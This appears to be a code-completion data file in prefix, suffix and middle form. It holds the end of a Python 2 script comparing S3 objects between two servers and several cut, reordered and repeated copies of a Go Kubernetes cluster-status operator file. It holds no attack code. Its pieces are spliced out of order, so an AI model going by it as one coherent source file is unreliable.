logging.debug('Objects_2_List: %s' %Objects_2_List)
open('Objects_2_List.txt','a').write('\n\t' + str(newObjs2).replace('), (', '\n\t'))
#找到合集中相同集合
Obj12 = set(Objects_1_List) & set(Objects_2_List)
logging.info('get same objects %d, len Obj1:%d, lenObj2:%d' %(len(Obj12),len(Objects_1_List), len(Objects_2_List)))
#校验obj
for obj in Obj12:
#2边读对象
msg = 'INFO: compare object: %s/%s' %(bucket,obj)
#print msg
logging.info(msg)
s3Request_getobj = s3PyCmd.S3RequestDescriptor(requestType = 'GetObject', ak = AKSK.split(',')[0], sk = AKSK.split(',')[1], \
AuthAlgorithm='AWSV2', virtualHost =False, domainName = '', region='')
s3Request_getobj.bucket = bucket
s3Request_getobj.key = obj[0]
if obj[1]: s3Request_getobj.queryArgs['versionId'] = obj[1]
s3Requesthandler1 = s3PyCmd.S3RequestHandler(s3Request_getobj, server1_conn)
s3Requesthandler2 = s3PyCmd.S3RequestHandler(s3Request_getobj, server2_conn)
t1 = threading.Thread(target=make_request, name='thread1', args=(s3Requesthandler1, True, True))
t1.start();
md5_2 = make_request(s3Requesthandler2, True, False)
t1.join();
md5_1 = MD5_Global
if not md5_1 or not md5_2:
totalReadErr += 2
msg = 'ERROR: read Object error. can not get md5. %s/%s, md5_1:%s, md5_2:%s' %(bucket, obj, md5_1, md5_2)
print msg; logging.error(msg)
elif md5_1 != md5_2:
totalObjectsErr += 2
msg = 'ERROR: Data Not Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2)
print msg
logging.error(msg)
elif md5_1 == md5_2:
totalObjectsOK += 2
logging.info('Data Consistent. object: [%s/%s], MD5 on server1: %s, MD5 on server2: %s' %(bucket, obj, md5_1, md5_2))
if time.time() - printResult > 10:
progress = 'INFO: totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
print progress; logging.info(progress)
printResult = time.time()
#去掉各自相同的部分
Objects_1_List = list(set(Objects_1_List) - Obj12)
Objects_2_List = list(set(Objects_2_List) - Obj12)
#如果不相同的部分相差超过了10000个,跳过该桶
if len(Objects_1_List)>10000 or len(Objects_2_List) >10000:
msg = 'ERROR: too many objects not equal, jump this bucket...'
totalObjectsErr += 10000
logging.error(msg); print msg;
break
if Objects_1_List:
totalObjectsErr += len(Objects_1_List)
msg = 'ERROR: Objects in server1 but not in server2 %r' %Objects_1_List
print msg
logging.error(msg)
if Objects_2_List:
totalObjectsErr += len(Objects_2_List)
msg = 'ERROR: Objects in server2 but not in server1 %r' %Objects_2_List
print msg
logging.error(msg)
logging.info('totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr))
print 'totalObjectsOK: %d, totalObjectsErr:%d, totalReadErr:%d' %(totalObjectsOK, totalObjectsErr,totalReadErr)
| son
| conditional_block |
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) EnsureCreated(ctx context.Context, obj interface{}) error |
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
}
| {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
} | identifier_body |
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) EnsureCreated(ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) | else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
}
}
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
nodesDiffer := nodes != nil && !allNodesEqual(clusterStatus.Nodes, nodes)
if nodesDiffer {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/nodes",
Value: nodes,
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status nodes")
}
}
// TODO emit metrics when update did not complete within a certain timeframe
return patches, nil
}
func allNodesHaveVersion(nodes []providerv1alpha1.StatusClusterNode, version string) bool {
if len(nodes) == 0 {
return false
}
for _, n := range nodes {
if n.Version != version {
return false
}
}
return true
}
func allNodesEqual(aNodes []providerv1alpha1.StatusClusterNode, bNodes []providerv1alpha1.StatusClusterNode) bool {
aRemoved := removeTimesFromNodes(aNodes)
bRemoved := removeTimesFromNodes(bNodes)
return reflect.DeepEqual(aRemoved, bRemoved)
}
func removeTimesFromNodes(nodes []providerv1alpha1.StatusClusterNode) []providerv1alpha1.StatusClusterNode {
var newNodes []providerv1alpha1.StatusClusterNode
for _, n := range nodes {
n.LastTransitionTime = metav1.Time{}
newNodes = append(newNodes, n)
}
return newNodes
}
| {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} | conditional_block |
create.go | package statusresource
import (
"context"
"fmt"
"reflect"
"time"
providerv1alpha1 "github.com/giantswarm/apiextensions/v6/pkg/apis/provider/v1alpha1"
"github.com/giantswarm/backoff"
"github.com/giantswarm/errors/tenant"
"github.com/giantswarm/k8sclient/v7/pkg/k8sclient"
"github.com/giantswarm/microerror"
"github.com/giantswarm/operatorkit/v7/pkg/controller/context/reconciliationcanceledcontext"
"github.com/giantswarm/tenantcluster/v4/pkg/tenantcluster"
"k8s.io/apimachinery/pkg/api/meta"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/client-go/kubernetes"
)
func (r *Resource) EnsureCreated(ctx context.Context, obj interface{}) error {
r.logger.LogCtx(ctx, "level", "debug", "message", "patching CR status")
// We process the status updates within its own backoff here to gurantee its
// execution independent of any eventual retries via the retry resource. It
// might happen that the reconciled object is not the latest version so any
// patch would fail. In case the patch fails we retry until we succeed. The
// steps of the backoff operation are as follows.
//
// Fetch latest version of runtime object.
// Compute patches for runtime object.
// Apply computed list of patches.
//
// In case there are no patches we do not need to do anything. So we prevent
// unnecessary API calls.
var modified bool
{
o := func() error {
accessor, err := meta.Accessor(obj)
if err != nil {
return microerror.Mask(err)
}
newObj, err := r.restClient.Get().AbsPath(accessor.GetSelfLink()).Do(ctx).Get()
if err != nil {
return microerror.Mask(err)
}
newAccessor, err := meta.Accessor(newObj)
if err != nil {
return microerror.Mask(err)
}
patches, err := r.computeCreateEventPatches(ctx, newObj)
if tenant.IsAPINotAvailable(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "tenant cluster is not available")
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling resource")
return nil
} else if err != nil {
return microerror.Mask(err)
}
if len(patches) > 0 {
err := r.applyPatches(ctx, newAccessor, patches)
if err != nil {
return microerror.Mask(err)
}
modified = true
}
return nil
}
b := r.backOffFactory()
n := func(err error, d time.Duration) {
r.logger.LogCtx(ctx, "level", "warning", "message", "retrying status patching due to error", "stack", fmt.Sprintf("%#v", err))
}
err := backoff.RetryNotify(o, b, n)
if err != nil {
return microerror.Mask(err)
}
}
if modified {
r.logger.LogCtx(ctx, "level", "debug", "message", "patched CR status")
reconciliationcanceledcontext.SetCanceled(ctx)
r.logger.LogCtx(ctx, "level", "debug", "message", "canceling reconciliation")
} else {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not patch CR status")
}
return nil
}
func (r *Resource) computeCreateEventPatches(ctx context.Context, obj interface{}) ([]Patch, error) {
clusterStatus, err := r.clusterStatusFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentVersion := clusterStatus.LatestVersion()
desiredVersion, err := r.versionBundleVersionFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
currentNodeCount := len(clusterStatus.Nodes)
desiredNodeCount, err := r.nodeCountFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
var patches []Patch
// In case a CR might not have a status at all, we cannot work with it below.
// We have to initialize it upfront to be safe. Note that we only initialize
// fields that are managed by the statusresource library implementation. There
// might be other properties managed by external authorities who have to
// manage their own initialization.
patches = ensureDefaultPatches(clusterStatus, patches)
// After initialization the most likely implication is the tenant cluster being
// in a creation status. In case no other conditions are given and no nodes
// are known and no versions are set, we set the tenant cluster status to a
// creating condition.
{
notCreating := !clusterStatus.HasCreatingCondition()
conditionsEmpty := len(clusterStatus.Conditions) == 0
nodesEmpty := len(clusterStatus.Nodes) == 0
versionsEmpty := len(clusterStatus.Versions) == 0
if notCreating && conditionsEmpty && nodesEmpty && versionsEmpty {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreating))
}
}
// Once the tenant cluster is created we set the according status condition so
// the cluster status reflects the transitioning from creating to created.
{
isCreating := clusterStatus.HasCreatingCondition()
notCreated := !clusterStatus.HasCreatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isCreating && notCreated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithCreatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeCreated))
}
}
// When we notice the current and the desired tenant cluster version differs,
// an update is about to be processed. So we set the status condition
// indicating the tenant cluster is updating now.
{
isCreated := clusterStatus.HasCreatedCondition()
notUpdating := !clusterStatus.HasUpdatingCondition()
versionDiffers := currentVersion != "" && currentVersion != desiredVersion
if isCreated && notUpdating && versionDiffers {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatingCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdating))
}
}
// Set the status cluster condition to updated when an update successfully
// took place. Precondition for this is the tenant cluster is updating and all
// nodes being known and all nodes having the same versions.
{
isUpdating := clusterStatus.HasUpdatingCondition()
notUpdated := !clusterStatus.HasUpdatedCondition()
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if isUpdating && notUpdated && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/conditions",
Value: clusterStatus.WithUpdatedCondition(),
})
r.logger.LogCtx(ctx, "level", "info", "message", fmt.Sprintf("setting %#q status condition", providerv1alpha1.StatusClusterTypeUpdated))
}
}
// Check all node versions held by the cluster status and add the version the
// tenant cluster successfully migrated to, to the historical list of versions.
{
hasTransitioned := clusterStatus.HasCreatedCondition() || clusterStatus.HasUpdatedCondition()
notSet := !clusterStatus.HasVersion(desiredVersion)
sameCount := currentNodeCount != 0 && currentNodeCount == desiredNodeCount
sameVersion := allNodesHaveVersion(clusterStatus.Nodes, desiredVersion)
if hasTransitioned && notSet && sameCount && sameVersion {
patches = append(patches, Patch{
Op: "replace",
Path: "/status/cluster/versions",
Value: clusterStatus.WithNewVersion(desiredVersion),
})
r.logger.LogCtx(ctx, "level", "info", "message", "setting status versions")
} | }
// Update the node status based on what the tenant cluster API tells us.
//
// TODO this is a workaround until we can read the node status information
// from the NodeConfig CR status. This is not possible right now because the
// NodeConfig CRs are still used for draining by older tenant clusters.
{
var k8sClient kubernetes.Interface
{
r.logger.LogCtx(ctx, "level", "debug", "message", "creating Kubernetes client for tenant cluster")
i, err := r.clusterIDFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
e, err := r.clusterEndpointFunc(obj)
if err != nil {
return nil, microerror.Mask(err)
}
restConfig, err := r.tenantCluster.NewRestConfig(ctx, i, e)
if tenantcluster.IsTimeout(err) {
r.logger.LogCtx(ctx, "level", "debug", "message", "did not create Kubernetes client for tenant cluster")
r.logger.LogCtx(ctx, "level", "debug", "message", "waiting for certificates timed out")
} else if err != nil {
return nil, microerror.Mask(err)
}
clientsConfig := k8sclient.ClientsConfig{
Logger: r.logger,
RestConfig: restConfig,
}
k8sClients, err := k8sclient.NewClients(clientsConfig)
if tenant.IsAPINotAvailable(err) || k8sclient.IsTimeout(err) {
r.logger.Debugf(ctx, "did not create Kubernetes client for tenant cluster, api is not yet available, canceling resource")
return nil, nil
} else if err != nil {
return nil, microerror.Mask(err)
}
k8sClient = k8sClients.K8sClient()
}
r.logger.LogCtx(ctx, "level", "debug", "message", "created Kubernetes client for tenant cluster")
o := metav1.ListOptions{}
list, err := k8sClient.CoreV1().Nodes().List(ctx, o)
if err != nil {
return nil, microerror.Mask(err)
}
var nodes []providerv1alpha1.StatusClusterNode
for _, node := range list.Items {
l := node.GetLabels()
n := node.GetName()
labelProvider := "giantswarm.io/provider"
p, ok := l[labelProvider]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelProvider)
}
labelVersion := p + "-operator.giantswarm.io/version"
v, ok := l[labelVersion]
if !ok {
return nil, microerror.Maskf(missingLabelError, labelVersion)
}
nodes = append(nodes, providerv1alpha1.NewStatusClusterNode(n, v, l))
}
